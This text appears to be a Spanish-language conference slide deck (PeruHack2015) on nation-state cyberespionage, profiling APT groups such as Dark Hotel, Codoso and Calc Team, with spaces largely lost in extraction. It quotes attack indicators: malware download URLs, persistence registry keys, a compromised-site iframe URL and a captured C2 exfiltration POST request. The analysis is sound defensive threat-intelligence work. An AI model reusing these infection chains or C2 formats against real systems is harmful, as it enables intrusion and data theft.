Cyberespionaje de Naciones

1. CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco

2. #whoami
▪ SecurityGeek(6+anhos)
▪ BlueTeam:GestiondeVulns,RespuestaaIncidentes,
ThreatIntelligence,etc.
▪ ThreatHunting
▪ AlgunasCerts:
OCSP,CEH,CPTE,ECSA
▪ @mvelazco

3. Cyber Espionaje
▪ Elusodeataquesinformaticosparaobteneraccesoa
informacionconfidencialoconfinesdesabotaje.
▪ Tipicamentellevadoacaboporungobierno;bien
estructuradoyconaccesoarecursos~ilimitados
▪ APT(AdvancedPersistentThreat)

4. Stuxnet - Agosto 2010
▪ Operacion“OlympicGames”
▪ EEEUeIsrael
▪ Objetivo:afectarelenriquicimientodeUranioenlacentral
nucleardeNatanz,Iran
▪ Exploto4 Zero Days
▪ Limahack2011

5. APT 1 Report – Febrero 2013
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

6. Mayo 2014

7. Post Snowden
Junio 2013

8. OPM – Junio 2015

9. Hacking Team – Julio 2015

10. Cómo lo hacen ?

11. The Cyber Kill Chain
Intelligence-Driven Computer Network
Defense Informed by Analysis of Adversary
Campaigns and Intrusion Kill Chains
Lockheed Martin, 2011

12. RSA - 2011

13. Analisis Tecnico

14. Dark Hotel Team
▪ GrupodecyberespionajeconnexosaCoreadelSuractivo
desdeel2010.
▪ Enfocadoencomprometerorganizacionesasociadascon
diplomacia,politicainternacional,seguridad&defensa.
▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia,
TailandiayUSA.

15. Dark Hotel Team – TTPs
▪ Correos“SpearPhishing”utilizandotemasdeinterespara
lasvictimas
▪ Hautilizadovulnerabilidades0day
▪ CVE-2014-0497yCVE-2009-4324
▪ Troyanohechoamedida:Tapaoux
▪ MetodosdeInfeccion
▪ BinariosconRight-to-leftoverride(RTLO)
▪ ArchivosHTA
▪ Macrosembebidas
▪ ScriptsJavascript

16. Dark Hotel Team – TTPs
▪ RTLOesuncaracterUnicode(U+202e)diseñadopara
soportarlenguajesqueseescribendederechaaizquierda.
▪ Estecaracterpuedeserabusadoparahacercreerque
archivosmaliciososnoloson.

17. Dark Hotel Team – TTPs

18. Dark Hotel Team – Campanha #1
▪ SpearPhishingconunarchivoraratachadoquecontiene
unbinarioutilizandoRTLO:letter_rcs.jpg.
▪ Alejecutarse,elbinarioescribe:
▪ letter_rcs.jpg–Imageninocua
▪ u.js–ScriptJavascriptmalicioso
▪ EnWindows,pordefecto,abrirunarchivoconextension
.JSinvoca Windowsscriptinghost(WSH). a
wscript.exe

19. Dark Hotel Team – Campanha #1

20. Dark Hotel Team – Campanha #1
▪ U.jsdescargayejecutaotroJavscriptde
hxxp://xxx.info/decod9/unzip.js
▪ Unzip.jsdescarga
hxxp://xxx.info/open99/office32loguardaen
%TEMP%csrtsrm.exe yloejecuta(payload)
▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion
▪ Keylogger
%APPDATA%MicrosoftWindowssystem64srmsr.exe
▪ DocumentScrapping
%APPDATA%MicrosoftWindowssystem64xsrmsd.exe

21. Dark Hotel Team – Campanha #1
▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty
creaunarchivocomprimidoconpassword
12345qwert!!
▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled
Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath
Valor:%WINDIR%system32csntzjy.exe
%APPDATA%MicrosoftWindowsExplorercsntzjy.exe

22. Dark Hotel Team – Campanha #2
▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy
mantuvoaccesoparaserusadocuandoseanecesario.
▪ Losobjetivossonusualmentealtosejecutivosdedistintas
industriasconinteresesenlaregionasiatica.
▪ Alconectarsealareddelhotel,elobjetivorecibeun
mensajedeactualizaciondeGoogle Toolbar,Adobe
FlashoWindows Messenger.
▪ Kaspersky

23. Codoso Team
▪ ActivodesdeAbril2011;tienevinculosconChina.
▪ Conduceintrusionesderedcomosoporteparaunesfuerzo
decolecciondeinteligenciaglobal
▪ Verticalesafectadasincluyen
▪ Energia
▪ Finanzas
▪ Defenss
▪ Gobierno
▪ DisidentesPoliticos

24. Codoso Team - TTPs
▪ SpearPhishingemails
▪ Waterholing
▪ Hanutilizadovulnerabidades0day
▪ Troyanohechoamedida:Mad Hatter/Codoso
▪ Utilizancorreosseñueloscontemasrelacioadosa
problemasconChina,eventosmundialesypolitica
internacional.

25. Codoso Team – Campanha 1
▪ Ennoviembredel2014,Codosoinfectolaconocidaweb
forbes.com einyectouniframemalicioso:
http://74.207.254.87/83a08vkzvt/8hthrx.swf
▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash
Player(CVE-2014-9163)eInternetExplorer9+
(CVE-2015-0071)
▪ SiesXPsoloseutilizaCVE-2014-9163,perosies
Vista+exploitatambienIEparabypasseasASLR

26. Codoso Team – Campanha 1
▪ Checks

27. Codoso Team – Campanha 1
▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga
en memoria.
▪ EstaDLLenumeraelequipoejecutandocomandosde
reconocimiento:systeminfo, ipconfig, tasklist.
▪ EnvialainformacionrecaudadaenelVIEWSTATEbase
64
▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae
inyectadaenmemoria.

28. Calc Team
▪ Activodesdeel2009,grupodeespionajeconnexosa
China.
▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel
finderecolectarinteligencia.
▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial
utilizandosiempretemasdegeopolitica.
▪ Explotovulnerabilidadesyaparchadas
▪ Utiliza3“familias”demalware

29. Calc Team – Campanha 1
▪ Spearphishing,“G20 Briefing Paper.zip” que
contiene2binariosmaliciosos(.exe)
▪ G20DiscussionPaper.exe
▪ GPFIWorkPlan2013.exe
▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon
elvisorpordefecto.
▪ Secopiaa%TEMP%, ycreaunallavederegistropara
serejecutadocuandoelequipoinicia (KeyLoggery
dropper)
▪ Alcopiarse,seejecutaconelparametro“again”ycontacta
astatus.acmetoy.com

30. Calc Team – Campanha 1

31. Calc Team – Campanha 1

32. Calc Team – Campanha 2
▪ Noviembre2015,APEC
▪ BriefingPaperonthePresident'sScheduleduringtheAPEC
LeadersMeeting.zip
▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido.
▪ Escribe
▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls
▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza
▪ %TEMP%1C224643A8B8.js –MalwareenJS
▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun
network

33. Calc Team – Campanha 2

34. Calc Team – Campanha 2

35. Calc Team – Campanha 2

36. Calc Team – Campanha 2
▪ POST/common.phpHTTP/1.1
Content-Type:application/x-www-form-urlencoded
User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;
Trident/5.0)
Referer:https://www.google.com
Content-Length:248
Accept:*/*
Host:presentation.twilightXXXXXX.com
Connection:Keep-Alive
action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI
0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx
ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta
W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF
AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg
4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D

37. Winnti Team
▪ Identificadoen2009
▪ Susataqueshansidoenfocadosalaindustriadejuegos
primariamentepararobarcertificadosdigitalesque
permitansoportenactividadesdecyberespionajeaotros
objetivos.
▪ Nexosconotrosgruposdeespionajeconloscuales
compartecertificadosdigitales

38. X Team

39. X Team

40. X Team

41. X Team

42. X Team

43. Conclusiones
▪ AdvancedPersistentThreat?
▪ ElCyberEsiponajecontinuaraimplementandocuanta
tecnicapuedasiempreycuandoseaefectiva
▪ Gruposdeespionajeorientalesutilizanlainformacion
recaudaparafortacelersuindustriainernamientrasque
occidentetieneotrosfines.
▪ Sudamerica?Peru?

44. CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco